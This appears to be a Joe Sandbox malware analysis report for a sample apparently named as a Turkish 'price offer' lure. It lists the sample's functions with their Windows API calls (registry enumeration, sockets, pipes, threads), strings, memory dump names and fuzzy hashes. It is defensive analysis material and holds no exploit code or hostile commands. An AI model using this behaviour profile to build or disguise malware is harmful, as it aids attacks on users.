
Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 009F05C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009F0601

Strings

nul, xrefs: 009F0639

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: e938ba35140d7302de59ea1553fc9bd8ed0ac0dc6b15a071817738d5a7e3d5ab
Instruction ID: d3ae2396113420eed440d3e9c7500c23e4b3da48fb1849ca9606faf0b23207fd
Opcode Fuzzy Hash: e938ba35140d7302de59ea1553fc9bd8ed0ac0dc6b15a071817738d5a7e3d5ab
Instruction Fuzzy Hash: AB21A3755003199BDB209F698C04AAA77ECBFD5734F204B19FAB1E72D1D7B09861CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00A140AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0098600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0098604C
Part of subcall function 0098600E: GetStockObject.GDI32(00000011), ref: 00986060
Part of subcall function 0098600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0098606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A14112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A1411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A1412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A14139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A14145

Strings

Msctls_Progress32, xrefs: 00A140E3

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 115dc4951e7ab7b15b8cd833157b2c8e33cd6ffdf8ffca91be56f989fe952faa
Instruction ID: 03f9bf19b62e03bf4aa05d62dc87725f695dda1045f4b05c7726c8b9eec98e2e
Opcode Fuzzy Hash: 115dc4951e7ab7b15b8cd833157b2c8e33cd6ffdf8ffca91be56f989fe952faa
Instruction Fuzzy Hash: B711B2B2140219BEEF119FA4CC86EE77F6DEF097A8F004210BA18A6150C7769C61DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 009BD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009BD7A3: _free.LIBCMT ref: 009BD7CC

_free.LIBCMT ref: 009BD82D

Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0

_free.LIBCMT ref: 009BD838
_free.LIBCMT ref: 009BD843
_free.LIBCMT ref: 009BD897
_free.LIBCMT ref: 009BD8A2
_free.LIBCMT ref: 009BD8AD
_free.LIBCMT ref: 009BD8B8

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction ID: 950a6317ee48bb8feeffde864bbdff02ac409b93e0875093dc4c652007aca3fa
Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction Fuzzy Hash: 981121B1542B08BBE521BFB0CE87FCB7BDCAF84720F404C25B29DA6492EA65B5054650

Uniqueness

Uniqueness Score: -1.00%

Function 009EDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009EDA74
LoadStringW.USER32(00000000), ref: 009EDA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009EDA91
LoadStringW.USER32(00000000), ref: 009EDA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 009EDADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 009EDAB9

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 5733d554c2bd95ad76f5a9d98ecadf34f5a06160f67ad2938671c9287a9c6714
Instruction ID: b0ac014d5eb87dbffe90575a7e6bc22aa2b4404520822de92271e1f1108d79fb
Opcode Fuzzy Hash: 5733d554c2bd95ad76f5a9d98ecadf34f5a06160f67ad2938671c9287a9c6714
Instruction Fuzzy Hash: 970186F65402087FE711DBE09D89FE7336CE708311F4049A1B716E2041E6749E854F74

Uniqueness

Uniqueness Score: -1.00%

Function 009F096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(015DE1D8,015DE1D8), ref: 009F097B
EnterCriticalSection.KERNEL32(015DE1B8,00000000), ref: 009F098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 009F099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009F09A9
CloseHandle.KERNEL32(00000000), ref: 009F09B8
InterlockedExchange.KERNEL32(015DE1D8,000001F6), ref: 009F09C8
LeaveCriticalSection.KERNEL32(015DE1B8), ref: 009F09CF

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: c45027c8b21bd8d17ce61e179c3c1f8c5e79e9a1b05c53ea584b6a115f85e83a
Instruction ID: 6f68a98fe89e9b9e5428f7d2f686ce80ce137c5c97030bb16890624426cf8ed0
Opcode Fuzzy Hash: c45027c8b21bd8d17ce61e179c3c1f8c5e79e9a1b05c53ea584b6a115f85e83a
Instruction Fuzzy Hash: A5F03131482622BBD751AFD4EE8CBE6BB39FF51712F405015F201508A1D7749466CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A01C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A01DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A01DE1
WSAGetLastError.WSOCK32 ref: 00A01DF2
htons.WSOCK32(?,?,?,?,?), ref: 00A01EDB
inet_ntoa.WSOCK32(?), ref: 00A01E8C

Part of subcall function 009E39E8: _strlen.LIBCMT ref: 009E39F2

Part of subcall function 00A03224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,009FEC0C), ref: 00A03240

_strlen.LIBCMT ref: 00A01F35

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 9232a1658424ed20ab5e9b686f728dda5b6fdace290d5d1979efac68567194fa
Instruction ID: 58c335cf3b571c9ea68b14c472642f9b15f4e51f53630c8dbc901b6189e77c46
Opcode Fuzzy Hash: 9232a1658424ed20ab5e9b686f728dda5b6fdace290d5d1979efac68567194fa
Instruction Fuzzy Hash: 2BB1CC31204305AFD724EF24D885F6ABBA5AFC5318F58894CF45A5B2E2DB31ED42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00985D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00985D30
GetWindowRect.USER32(?,?), ref: 00985D71
ScreenToClient.USER32(?,?), ref: 00985D99
GetClientRect.USER32(?,?), ref: 00985ED7
GetWindowRect.USER32(?,?), ref: 00985EF8

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 3d6a448f7e847a4c0098c4ccfadb2b1f561ef567f3e1c6ad512456d26db15f16
Instruction ID: ff74478e4563a5818ad2ddb0428bc4cc0451535f287e7f458ef4552efa4c9b87
Opcode Fuzzy Hash: 3d6a448f7e847a4c0098c4ccfadb2b1f561ef567f3e1c6ad512456d26db15f16
Instruction Fuzzy Hash: 5CB18C34A0074ADBDB10DFA8C880BEEB7F5FF58310F14981AE8A9D7250DB34AA55DB51

Uniqueness

Uniqueness Score: -1.00%

Function 009B01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 009B00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B00D6
__allrem.LIBCMT ref: 009B00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B010B
__allrem.LIBCMT ref: 009B0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B0140

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 3cc34d3ac5473c412fcdd184d5c5c80d4fc0af48fd48009433d7aee9f77ac500
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 8C81E372A007069FE724AA68CD52BAB73E8EFC2374F24453EF451D7281E7B4D9008B90

Uniqueness

Uniqueness Score: -1.00%

Function 009B61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009A82D9,009A82D9,?,?,?,009B644F,00000001,00000001,8BE85006), ref: 009B6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009B644F,00000001,00000001,8BE85006,?,?,?), ref: 009B62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009B63D8
__freea.LIBCMT ref: 009B63E5

Part of subcall function 009B3820: RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852

__freea.LIBCMT ref: 009B63EE
__freea.LIBCMT ref: 009B6413

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 7c3b12f7a1e19195d1c40b0adf3cbf3211e0ce00a844ebdb44638988690a816c
Instruction ID: 10e5259da6331b2e06c985211790a028bc131e9d852dca0eff9b101f1c4c2629
Opcode Fuzzy Hash: 7c3b12f7a1e19195d1c40b0adf3cbf3211e0ce00a844ebdb44638988690a816c
Instruction Fuzzy Hash: 2851B172A00216ABEB258FA4DE81FFF77AAEB84770F154629FC05D6150DB38EC44C660

Uniqueness

Uniqueness Score: -1.00%

Function 00A0BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

Part of subcall function 00A0C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A0B6AE,?,?), ref: 00A0C9B5
Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0C9F1
Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA68
Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A0BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A0BD25
RegCloseKey.ADVAPI32(00000000), ref: 00A0BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A0BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A0BDF3
RegCloseKey.ADVAPI32(?), ref: 00A0BDFF

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 874218da7d6c611d808d5b2a097e7a339d7d786f2a100aefc1eee1ee8ff9ec23
Instruction ID: 5c6fc8b273a56825cdfe363224d5eca0b7424bf1dc6386ac1d19a02a19952ba7
Opcode Fuzzy Hash: 874218da7d6c611d808d5b2a097e7a339d7d786f2a100aefc1eee1ee8ff9ec23
Instruction Fuzzy Hash: 7B81C030218245EFD714DF24D991E2ABBE5FF84308F14855CF4598B2A2DB31ED45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 009DF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 009DF7B9
SysAllocString.OLEAUT32(00000001), ref: 009DF860
VariantCopy.OLEAUT32(009DFA64,00000000), ref: 009DF889
VariantClear.OLEAUT32(009DFA64), ref: 009DF8AD
VariantCopy.OLEAUT32(009DFA64,00000000), ref: 009DF8B1
VariantClear.OLEAUT32(?), ref: 009DF8BB

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: a62d80b71b106920ae81cb2750a6ffb00e49d67272fe4e32a22917bfbce078c0
Instruction ID: f717a62bc2ad8842bc78a4f174caa310e9033ed40f4655c769ab0e9fbe47cabd
Opcode Fuzzy Hash: a62d80b71b106920ae81cb2750a6ffb00e49d67272fe4e32a22917bfbce078c0
Instruction Fuzzy Hash: 3E51C635980310BACF14AB65D8B6B39B3A8EF85310B24C867E907EF391DB748C40C796

Uniqueness

Uniqueness Score: -1.00%

Function 009F910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00987620: _wcslen.LIBCMT ref: 00987625

Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 009F94E5
_wcslen.LIBCMT ref: 009F9506
_wcslen.LIBCMT ref: 009F952D
GetSaveFileNameW.COMDLG32(00000058), ref: 009F9585

Strings

X, xrefs: 009F9412

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 733041eac8fbdb0562a61b7ba6f5362c0fd047ec160a62a5a04045ed28da7313
Instruction ID: 8f160e3aa0b82fc58480fc9e2bab66bf741900abadbe95031c3b70a340ef3b28
Opcode Fuzzy Hash: 733041eac8fbdb0562a61b7ba6f5362c0fd047ec160a62a5a04045ed28da7313
Instruction Fuzzy Hash: EEE178316083119FD724EF24C881B6AB7E4BF85314F14896DF9999B3A2DB31ED05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0099920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2

BeginPaint.USER32(?,?,?), ref: 00999241
GetWindowRect.USER32(?,?), ref: 009992A5
ScreenToClient.USER32(?,?), ref: 009992C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009992D3
EndPaint.USER32(?,?,?,?,?), ref: 00999321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009D71EA

Part of subcall function 00999339: BeginPath.GDI32(00000000), ref: 00999357

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 071df920a95f11dcfe74ecb90467ccc33cda28feb8898b4296bc32bd4487dfa6
Instruction ID: d9b6006f3f77405cd083eef74be73082a216968b91dee4b9826c029ee2931d13
Opcode Fuzzy Hash: 071df920a95f11dcfe74ecb90467ccc33cda28feb8898b4296bc32bd4487dfa6
Instruction Fuzzy Hash: 0241B070148300EFDB21DFA8CC85FBA7BA8FB46321F04462DF965872A1D7319846DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009F07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 009F080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 009F0847
EnterCriticalSection.KERNEL32(?), ref: 009F0863
LeaveCriticalSection.KERNEL32(?), ref: 009F08DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 009F08F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 009F0921

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 3630edfe7b01dfef34dd1fa0193738d7fe920d7cd517efc65e2ca50559c815c9
Instruction ID: 91bd66663744f41efdf8114728468a3260a4edf7e685d669e51da044c1f709de
Opcode Fuzzy Hash: 3630edfe7b01dfef34dd1fa0193738d7fe920d7cd517efc65e2ca50559c815c9
Instruction Fuzzy Hash: 9B417E75900209EBDF14EF94DC85AAAB778FF84310F1480A5ED04DA297D731DE65DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A181DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,009DF3AB,00000000,?,?,00000000,?,009D682C,00000004,00000000,00000000), ref: 00A1824C
EnableWindow.USER32(00000000,00000000), ref: 00A18272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00A182D1
ShowWindow.USER32(00000000,00000004), ref: 00A182E5
EnableWindow.USER32(00000000,00000001), ref: 00A1830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00A1832F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: ea339cb9d5eba2b5ff12668dd538dae7694a4cac9b36a17fac6075cccecc8d6b
Instruction ID: d3d0fc99407b814db5f520a4259970dca515a52db2f61ee2454d100b8ceee6a6
Opcode Fuzzy Hash: ea339cb9d5eba2b5ff12668dd538dae7694a4cac9b36a17fac6075cccecc8d6b
Instruction Fuzzy Hash: A041E474601640EFDB22CF54D899BE47BE1FB0A715F1841A8F5684F2B2CB79AC82CB40

Uniqueness

Uniqueness Score: -1.00%

Function 009E4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 009E4C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009E4CB2
